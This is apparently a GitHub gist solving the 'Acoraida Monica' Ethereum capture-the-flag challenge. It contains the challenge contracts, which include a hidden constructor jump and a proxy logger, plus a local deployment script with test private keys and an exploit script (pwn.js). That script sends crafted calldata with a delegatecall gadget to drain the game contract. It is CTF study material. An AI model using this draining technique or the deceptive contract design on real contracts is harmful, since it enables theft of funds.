Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Acoraida Monica
/*
* The contract deployed on this address is a
*/
pragma solidity =0.4.25;
contract b{
function Start(string _question, string _answer) public payable;
}
contract a{
constructor(address t, string q, string r) public{
b(t).Start(q,r);
}
}
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
address questioner;
string public question;
bytes32 private answerHash;
constructor(bytes a) {
assembly{
pc
0xe1
add
jump
}
}
modifier onlyHuman{
uint size;
address addr = msg.sender;
assembly { size := extcodesize(addr) }
require(size==0);
_;
}
function Start(string _question, string _answer) public payable{
if(answerHash==0){
answerHash = keccak256(_answer);
question = _question;
questioner = msg.sender;
}
}
function NewRound(string _question, bytes32 _answerHash) public payable{
if(msg.sender == questioner && msg.value >= 0.5 ether){
require(_answerHash != keccak256(sampleAnswer));
question = _question;
answerHash = _answerHash;
logger.AcoraidaMonicaWantsToKnowTheNewQuestion(_question);
logger.AcoraidaMonicaWantsToKnowTheNewAnswerHash(_answerHash);
}
}
function TheAnswerIs(string _answer) onlyHuman public payable{
//require(msg.sender != questioner);
if(answerHash == keccak256(_answer) && msg.value >= 1 ether){
questioner = msg.sender;
msg.sender.transfer(address(this).balance);
logger.AcoraidaMonicaWantsToKeepALogOfTheWinner(msg.sender);
}
}
/*function setLogger(address _log) public {
require(msg.sender == questioner);
logger = Logger(_log);
}*/
function () payable {}
}
contract Logger{
event WeHaveAWinner(address);
event NewQuestion(string);
event NewAnswerHs(bytes32);
function AcoraidaMonicaWantsToKeepALogOfTheWinner(address winner) public {
emit WeHaveAWinner(winner);
}
function AcoraidaMonicaWantsToKnowTheNewQuestion(string _question) public{
emit NewQuestion(_question);
}
function AcoraidaMonicaWantsToKnowTheNewAnswerHash(bytes32 _answerHash) public {
emit NewAnswerHs(_answerHash);
}
}
const Web3 = require('web3')
const Tx = require('ethereumjs-tx')
/*
$ rm -rf data
$ geth --datadir ./data init genesis.json
$ geth --datadir ./data --rpcapi eth,personal,web3,admin,miner,debug --rpc --mine --etherbase "0x492705c00090cb7c1cbb5ec3ab0b09f310dec399" --rpccorsdomain "*" --networkid="31231" --nodiscover
$ geth attach http://127.0.0.1:8545
> miner.start()
$ node deploy.js
LoggerAgent contract: 0xFEB07903B4972f4A668932D86C54D9D5264797cF
Logger contract: 0x5ba0805d3aba403ab3eB4A61fE31Cd7BBdd1e576
AcoraidaMonicaGame contract: 0x3A3AAC709285A54f7E0548b1609B3a8c96d7Fb09
LoggerAgent upgrade() success: true
a contract: 0x4AC502228e8FE102984BcB38c15859EeC9509E0F
AcoraidaMonicaGame Start() success: true
*/
// local geth network
const web3 = new Web3(new Web3.providers.HttpProvider('http://127.0.0.1:8545'))
const privateKey = new Buffer('748e86e90bc4b3f894d79ff84cec01067ab8e7337e66d8747b6ebc453191ac4e', 'hex')
const addressFrom = '0x47a1b97b7A1f1Ad90741Ea94230b2361667fa2DB'
// variables to remember the LoggerAgent and AcoraidaMonicaGame contract
var loggerAgent;
var gameContract;
// create "LoggerAgent" contract
var tx = new Tx({
nonce: '0x00',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x00',
from: addressFrom,
data: '0x608060405234801561001057600080fd5b50604080517f41636f7261696461204d6f6e6963612069732063757465203a500000000000008152905190819003601a019020610056903364010000000061005b810204565b61005f565b9055565b6102c48061006e6000396000f3006080604052600436106100615763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630900f010811461007357806313af4035146100a15780635c60da1b146100cf5780638da5cb5b1461010d575b61007161006c610122565b610165565b005b34801561007f57600080fd5b5061007173ffffffffffffffffffffffffffffffffffffffff60043516610189565b3480156100ad57600080fd5b5061007173ffffffffffffffffffffffffffffffffffffffff600435166101f1565b3480156100db57600080fd5b506100e4610122565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b34801561011957600080fd5b506100e4610256565b604080517f536f20697320686572206c6f67676572203a44000000000000000000000000008152905190819003601301902060009061016090610290565b905090565b3660008037600080366000845af43d6000803e808015610184573d6000f35b3d6000fd5b33610192610256565b73ffffffffffffffffffffffffffffffffffffffff16146101b257600080fd5b604080517f536f20697320686572206c6f67676572203a4400000000000000000000000000815290519081900360130190206101ee9082610294565b50565b336101fa610256565b73ffffffffffffffffffffffffffffffffffffffff161461021a57600080fd5b604080517f41636f7261696461204d6f6e6963612069732063757465203a500000000000008152905190819003601a0190206101ee9082610294565b604080517f41636f7261696461204d6f6e6963612069732063757465203a500000000000008152905190819003601a019020600090610160905b5490565b90555600a165627a7a72305820037b138c3c4ca69837603d87247d193891ab9393bbf5f87ec357fca896cc7e5e0029'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x'+tx.serialize().toString('hex')).on('receipt', t => {
console.log("LoggerAgent contract: "+ t.contractAddress);
loggerAgent = t.contractAddress;
// create "Logger" contract
var tx = new Tx({
nonce: '0x01',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x00',
from: addressFrom,
data: '0x608060405234801561001057600080fd5b50610246806100206000396000f3006080604052600436106100565763ffffffff7c01000000000000000000000000000000000000000000000000000000006000350416630900f010811461005b578063679e11491461008b578063f1952473146100a3575b600080fd5b34801561006757600080fd5b5061008973ffffffffffffffffffffffffffffffffffffffff600435166100fc565b005b34801561009757600080fd5b50610089600435610148565b3480156100af57600080fd5b506040805160206004803580820135601f810184900484028501840190955284845261008994369492936024939284019190819084018382808284375094975061017e9650505050505050565b6040805173ffffffffffffffffffffffffffffffffffffffff8316815290517f10233db257888c60414333eee11dab8e8dabaf552466002fee253e03615db1d19181900360200190a150565b6040805182815290517ff364df9ddb52f724ebe11e75eeec2201580773fcb1e859511504ae872d4bf4569181900360200190a150565b7f0230497b4479b19065f0fe9c0bdee0259402f893cfa9e9b6a44fbf6ecca6299c816040518080602001828103825283818151815260200191508051906020019080838360005b838110156101dd5781810151838201526020016101c5565b50505050905090810190601f16801561020a5780820380516001836020036101000a031916815260200191505b509250505060405180910390a1505600a165627a7a72305820a0f75e6ea7890191aded7de6d24ce8c95b6effc66e67e5b577d26eedb1738e7f0029'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("Logger contract: "+ t.contractAddress);
// create "AcoraidaMonicaGame" contract
var tx = new Tx({
nonce: '0x02',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x00',
from: addressFrom,
data: '0x6004600055610120604052607960808190527f41636f7261696461204d6f6e6963612061646d6972657320736d61727420677560a09081527f79732c207368652764206c696b6520746f20706179203130303030455448207460c0527f6f20746865206f6e652077686f20636f756c6420616e7377657220686572207160e0527f75657374696f6e2e20576f756c6420697420626520796f753f00000000000000610100526100b191600191906100db565b503480156100be57600080fd5b50604051610177380380610177833981016040528051015860e101565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061011c57805160ff1916838001178555610149565b82800160010185558215610149579182015b8281111561014957825182559160200191906001019061012e565b50610155929150610159565b5090565b61017391905b80821115610155576000815560010161015f565b905600000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000009d55b633ccfd60b61262a556109c4610171f36080604052600436106100985763ffffffff7c0100000000000000000000000000000000000000000000000000000000600035041663281ba0a8811461009a5780633fad9ae01461012457806346a3ec671461013957806354fd4d50146101855780637284e416146101ac578063aa332032146101c1578063c76de3e91461020f578063f24ccbfe14610299578063f7ff68a3146102d7575b005b3480156100a657600080fd5b506100af6102ec565b6040805160208082528351818301528351919283929083019185019080838360005b838110156100e95781810151838201526020016100d1565b50505050905090810190601f1680156101165780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561013057600080fd5b506100af61034c565b6040805160206004803580820135601f81018490048402850184019095528484526100989436949293602493928401919081908401838280828437509497506103da9650505050505050565b34801561019157600080fd5b5061019a61053b565b60408051918252519081900360200190f35b3480156101b857600080fd5b506100af610541565b6040805160206004803580820135601f8101849004840285018401909552848452610098943694929360249392840191908190840183828082843750949750509335945061059b9350505050565b6040805160206004803580820135601f810184900484028501840190955284845261009894369492936024939284019190819084018382808284375050604080516020601f89358b018035918201839004830284018301909452808352979a9998810197919650918201945092508291508401838280828437509497506108139650505050505050565b3480156102a557600080fd5b506102ae6108ae565b6040805173ffffffffffffffffffffffffffffffffffffffff9092168252519081900360200190f35b3480156102e357600080fd5b506100af6108c6565b606060405190810160405280603081526020017f242a2126235e5b602061402e333b5461262a54602052603c607e355a605e355681526020017f20596f752062656174206d6521203a440000000000000000000000000000000081525081565b6003805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156103d25780601f106103a7576101008083540402835291602001916103d2565b820191906000526020600020905b8154815290600101906020018083116103b557829003601f168201915b505050505081565b33803b9081156103e957600080fd5b826040518082805190602001908083835b602083106104195780518252601f1990920191602091820191016103fa565b5181516020939093036101000a60001901801990911692169190911790526040519201829003909120600454149250508115905061045f5750670de0b6b3a76400003410155b15610536576002805473ffffffffffffffffffffffffffffffffffffffff1916339081179091556104b13660a01415815761402e61049d3361ffff16565b5101561580156104b1563d6000803e3d6000fd5b50604080517f0900f010000000000000000000000000000000000000000000000000000000008152336004820152905173FEB07903B4972f4A668932D86C54D9D5264797cF91630900f01091602480830192600092919082900301818387803b15801561051d57600080fd5b505af1158015610531573d6000803e3d6000fd5b505050505b505050565b60005481565b60018054604080516020600284861615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156103d25780601f106103a7576101008083540402835291602001916103d2565b60025473ffffffffffffffffffffffffffffffffffffffff16331480156105ca57506706f05b59d3b200003410155b1561080f5760408051606081018252603080825256242a2126235e5b602061402e333b5461262a54602052603c607e355a605e3556602083019081527f20596f752062656174206d6521203a4400000000000000000000000000000000838501529251919282918083835b602083106106545780518252601f199092019160209182019101610635565b5181516020939093036101000a60001901801990911692169190911790526040519201829003909120841415925061068e91505057600080fd5b81516106a19060039060208501906108fd565b5060048181556040517ff1952473000000000000000000000000000000000000000000000000000000008152602091810182815284516024830152845173FEB07903B4972f4A668932D86C54D9D5264797cF9363f195247393879392839260449092019185019080838360005b8381101561072657818101518382015260200161070e565b50505050905090810190601f1680156107535780820380516001836020036101000a031916815260200191505b5092505050600060405180830381600087803b15801561077257600080fd5b505af1158015610786573d6000803e3d6000fd5b5050604080517f679e114900000000000000000000000000000000000000000000000000000000815260048101859052905173FEB07903B4972f4A668932D86C54D9D5264797cF935063679e11499250602480830192600092919082900301818387803b1580156107f657600080fd5b505af115801561080a573d6000803e3d6000fd5b505050505b5050565b600454151561080f57806040518082805190602001908083835b6020831061084c5780518252601f19909201916020918201910161082d565b51815160209384036101000a600019018019909216911617905260405191909301819003902060045550845161088a935060039250908501906108fd565b506002805473ffffffffffffffffffffffffffffffffffffffff1916331790555050565b73FEB07903B4972f4A668932D86C54D9D5264797cF81565b60408051808201909152601781527f57686f2069732041636f7261696461204d6f6e6963613f000000000000000000602082015281565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f1061093e57805160ff191683800117855561096b565b8280016001018555821561096b579182015b8281111561096b578251825591602001919060010190610950565b5061097792915061097b565b5090565b61099591905b808211156109775760008155600101610981565b905600a165627a7a723058205bf450560abe05048d3aecd129bb6420ca5acbef2f19c0ef9dca3f158d49e23f00290000000000000000000000'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("AcoraidaMonicaGame contract: "+ t.contractAddress);
gameContract = t.contractAddress;
// call upgrade() on LoggerAgent
var tx = new Tx({
nonce: '0x03',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x00',
to: loggerAgent,
from: addressFrom,
data: '0x608060405234801561001057600080fd5b506040516101be3803806101be8339810160408181528251602080850151838601517fc76de3e90000000000000000000000000000000000000000000000000000000086526004860194855290860180516044870152805193969095910193600160a060020a0387169363c76de3e993879387939283926024830192606401919087019080838360005b838110156100b257818101518382015260200161009a565b50505050905090810190601f1680156100df5780820380516001836020036101000a031916815260200191505b50838103825284518152845160209182019186019080838360005b838110156101125781810151838201526020016100fa565b50505050905090810190601f16801561013f5780820380516001836020036101000a031916815260200191505b50945050505050600060405180830381600087803b15801561016057600080fd5b505af1158015610174573d6000803e3d6000fd5b505050505050506035806101896000396000f3006080604052600080fd00a165627a7a723058203e4de9ab30a2fe5e13562c8ce9a8dbc53b04e0ebee143230356f0bebf608c9380029000000000000000000000000feb07903b4972f4a668932d86c54d9d5264797cf000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000048496e204d6164616761736361722c20796f752063616e6e6f742074616b6520612070696374757265206f662061206c656d75722077697468206772617920686169722e205768793f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017200000000000000000000000000000000000000000000000000000000000000'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("LoggerAgent upgrade() success: "+t.status);
/*
contract b{
function Start(string _question, string _answer) public payable;
}
contract a{
constructor(address t, string q, string r) public{
b(t).Start(q,r);
}
}
*/
// create "a" contract
var tx = new Tx({
nonce: '0x04',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x0',
from: addressFrom,
data: '0x608060405234801561001057600080fd5b506040516101be3803806101be8339810160408181528251602080850151838601517fc76de3e90000000000000000000000000000000000000000000000000000000086526004860194855290860180516044870152805193969095910193600160a060020a0387169363c76de3e993879387939283926024830192606401919087019080838360005b838110156100b257818101518382015260200161009a565b50505050905090810190601f1680156100df5780820380516001836020036101000a031916815260200191505b50838103825284518152845160209182019186019080838360005b838110156101125781810151838201526020016100fa565b50505050905090810190601f16801561013f5780820380516001836020036101000a031916815260200191505b50945050505050600060405180830381600087803b15801561016057600080fd5b505af1158015610174573d6000803e3d6000fd5b505050505050506035806101896000396000f3006080604052600080fd00a165627a7a723058203e4de9ab30a2fe5e13562c8ce9a8dbc53b04e0ebee143230356f0bebf608c93800290000000000000000000000003A3AAC709285A54f7E0548b1609B3a8c96d7Fb09000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000048496e204d6164616761736361722c20796f752063616e6e6f742074616b6520612070696374757265206f662061206c656d75722077697468206772617920686169722e205768793f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017200000000000000000000000000000000000000000000000000000000000000'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("a contract: "+ t.contractAddress);
// call Start() on AcoraidaMonicaGame and send Ether
var tx = new Tx({
nonce: '0x05',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0xd3c21bcecceda1000000',
from: addressFrom,
to: gameContract,
data: '0xc76de3e9000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000048496e204d6164616761736361722c20796f752063616e6e6f742074616b6520612070696374757265206f662061206c656d75722077697468206772617920686169722e205768793f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000027596f75206e65656420612063616d65726120696e7374656164206f66206772617920686169722e00000000000000000000000000000000000000000000000000'
});
tx.sign(privateKey);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log("AcoraidaMonicaGame Start() success: "+t.status);
});
});
});
});
});
});
{
"config": {
"chainId": 31231,
"homesteadBlock": 0,
"eip155Block": 0,
"eip158Block": 0,
"byzantiumBlock": 0
},
"coinbase": "0x492705c00090cb7c1cbb5ec3ab0b09f310dec399",
"difficulty": "0",
"gasLimit": "10000000000000",
"alloc": {
"0xcf2f3781229416d78c9861c9a5f0617ba5ca96af": {
"balance": "100000000000000000000000000000"
},
"0x47a1b97b7A1f1Ad90741Ea94230b2361667fa2DB": {
"balance": "100000000000000000000000000000"
},
"0x19baa751d1092c906ac84ea4681fa91e269e6cb9": {
"balance": "200000000000000000000"
},
"0x492705c00090cb7c1cbb5ec3ab0b09f310dec399": {
"balance": "100000000000000000000000000000"
},
"0xf29e621ee00eb8aca28f7fab785c054e465805e6": {
"balance": "200000000000000000000"
}
}
}
contract LiveOverflow{
address constant public player = 0x0019baa751d1092c906ac84ea4681fa91e269e6cb9;
address constant public game = 0x003a3aac709285a54f7e0548b1609b3a8c96d7fb09;
function withdraw() public payable returns (uint256) {
player.transfer(game.balance);
return 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbe7;
}
}
// logger.js
var Web3 = require('web3');
web3 = new Web3('http://127.0.0.1:8545')
function getBlock(number) {
web3.eth.getBlock(number, (err, block) => {
if (block != null) {
//console.log("====== BLOCK # "+number+" ========");
//console.log(block)
block.transactions.forEach(tx => {
//console.log("====== BLOCK # "+number+" TX # "+tx+" ========");
//console.log(tx)
web3.eth.getTransaction(tx).then((err, _tx) => {
console.log("====== BLOCK # "+number+" | TX # "+tx+" ========");
console.log(err);
});
web3.eth.getTransactionReceipt(tx).then((err, _tx) => {
console.log("====== BLOCK # "+number+" | Receipt # "+tx+" ========");
console.log(err);
});
})
}
getBlock(number + 1)
});
}
getBlock(0);
/*
* The contract deployed on this address is Logger
*/
pragma solidity =0.4.25;
contract Logger{
event WeHaveAWinner(address);
event NewQuestion(string);
event NewAnswerHs(bytes32);
function AcoraidaMonicaWantsToKeepALogOfTheWinner(address winner) public {
emit WeHaveAWinner(winner);
}
function AcoraidaMonicaWantsToKnowTheNewQuestion(string _question) public{
emit NewQuestion(_question);
}
function AcoraidaMonicaWantsToKnowTheNewAnswerHash(bytes32 _answerHash) public {
emit NewAnswerHs(_answerHash);
}
}
/*
* The contract deployed on this address is LoggerAgent
*/
pragma solidity =0.4.25;
contract LoggerAgent{
bytes32 private constant ownerSlot = keccak256("Acoraida Monica is cute :P");
bytes32 private constant implSlot = keccak256("So is her logger :D");
constructor() public{
setAddress(ownerSlot, msg.sender);
}
modifier onlyOwner{
require(owner()==msg.sender);
_;
}
function getAddress(bytes32 _slot) internal view returns (address value) {
bytes32 s = _slot;
assembly {value := sload(s)}
}
function setAddress(bytes32 _slot, address _address) internal {
bytes32 s = _slot;
assembly {sstore(s, _address)}
}
function owner() public view returns (address){
return getAddress(ownerSlot);
}
function implementation() public view returns (address){
return getAddress(implSlot);
}
function setOwner(address _owner) onlyOwner public{
setAddress(ownerSlot, _owner);
}
function upgrade(address _impl) onlyOwner public {
setAddress(implSlot, _impl);
}
function _delegateforward(address _impl) internal {
assembly {
calldatacopy(0, 0, calldatasize)
let result := delegatecall(gas, _impl, 0, calldatasize, 0, 0)
returndatacopy(0, 0, returndatasize)
switch result
case 0 {revert(0, returndatasize)}
default {return(0, returndatasize)}
}
}
function () payable public{
_delegateforward(implementation());
}
}
contract Logger{
event WeHaveAWinner(address);
event NewQuestion(string);
event NewAnswerHs(bytes32);
function AcoraidaMonicaWantsToKeepALogOfTheWinner(address winner) public {
emit WeHaveAWinner(winner);
}
function AcoraidaMonicaWantsToKnowTheNewQuestion(string _question) public{
emit NewQuestion(_question);
}
function AcoraidaMonicaWantsToKnowTheNewAnswerHash(bytes32 _answerHash) public {
emit NewAnswerHs(_answerHash);
}
}
// pwn.js
var Web3 = require('web3');
const Tx = require('ethereumjs-tx')
//web3 = new Web3('http://100.100.0.4:8090/twO7sl%2BRT0%2BTyBUCbrQ%2BjQ%3D%3D')
const web3 = new Web3(new Web3.providers.HttpProvider('http://127.0.0.1:8545'))
// 0x19baa751d1092c906ac84ea4681fa91e269e6cb9
const privateKeyPlayer = new Buffer('91ca018bbf10b7c61d4d3b863298b1b26e2332f242e090dd35c4b314c5eeebf6', 'hex');
// 0xf29e621ee00eb8aca28f7fab785c054e465805e6
const privateKeyAttack = new Buffer('3e38f85bac0f090b02bccb10ca168969254823d751b73937e8f8aa5c207a2e8a', 'hex');
/*
contract LiveOverflow{
address constant public player = 0x0019baa751d1092c906ac84ea4681fa91e269e6cb9;
address constant public game = 0x003a3aac709285a54f7e0548b1609b3a8c96d7fb09;
function withdraw() public payable returns (uint256) {
player.transfer(game.balance);
// jump target integer overflow
return 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbe7;
}
}
*/
// create LiveOverflow attack contract with player privatekey
var tx = new Tx({
nonce: '0x00',
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
value: '0x0',
from: '0x19baa751d1092c906ac84ea4681fa91e269e6cb9', // Player
data: '0x608060405234801561001057600080fd5b50610232806100206000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680633ccfd60b1461005c57806348db5f891461007a578063c3fe3e28146100d1575b600080fd5b610064610128565b6040518082815260200191505060405180910390f35b34801561008657600080fd5b5061008f6101d6565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156100dd57600080fd5b506100e66101ee565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b60007319baa751d1092c906ac84ea4681fa91e269e6cb973ffffffffffffffffffffffffffffffffffffffff166108fc733a3aac709285a54f7e0548b1609b3a8c96d7fb0973ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156101af573d6000803e3d6000fd5b507ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbe7905090565b7319baa751d1092c906ac84ea4681fa91e269e6cb981565b733a3aac709285a54f7e0548b1609b3a8c96d7fb09815600a165627a7a723058207e04ac9f2efaab04eecec5a56e18c5b285cd574fa308ac0b3a5567897979fcc30029'
})
tx.sign(privateKeyPlayer);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex')).on('receipt', t => {
console.log('LiveOverflow Attack Contract created: '+t.contractAddress);
// 0x5e6
var account = web3.eth.accounts.privateKeyToAccount("0x"+privateKeyAttack.toString('hex'));
console.log("Attack address: "+account.address)
payload = '0x46a3ec67' // TheAnswerIs
payload += '0000000000000000000000000000000000000000000000000000000000000020'
payload += '0000000000000000000000000000000000000000000000000000000000000001' // answer length
payload += '7200000000000000000000000000000000000000000000000000000000000000' // answer "r"
payload += '00000000000000000000000000000000000000000000000009a2' // delegatecall JOP gadget
payload += '000000000000000000000000d958E2a8d4751665E6292267fA3f436fE13d3265' // <- t.contractAddress (Attack Contract)
payload += '4848';
web3.eth.getTransactionCount(account.address).then(txCount => {
var tx = new Tx({
nonce: txCount,
gasPrice: '0x1',
gasLimit: '0x2DC6C0',
to: '0x3A3AAC709285A54f7E0548b1609B3a8c96d7Fb09', // AcoraidaMonicaGame contract
value: '0xde0b6b3a7640001', // 1 Ether
from: account.address,
data: payload,
});
tx.sign(privateKeyAttack);
web3.eth.sendSignedTransaction('0x' + tx.serialize().toString('hex'))
.on('transactionHash', function(hash){
console.log("transactionHash: "+hash);
})
.on('receipt', function(receipt){
console.log("Attack success: "+receipt.status)
console.log(receipt);
})
.on('error', console.error);
});
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.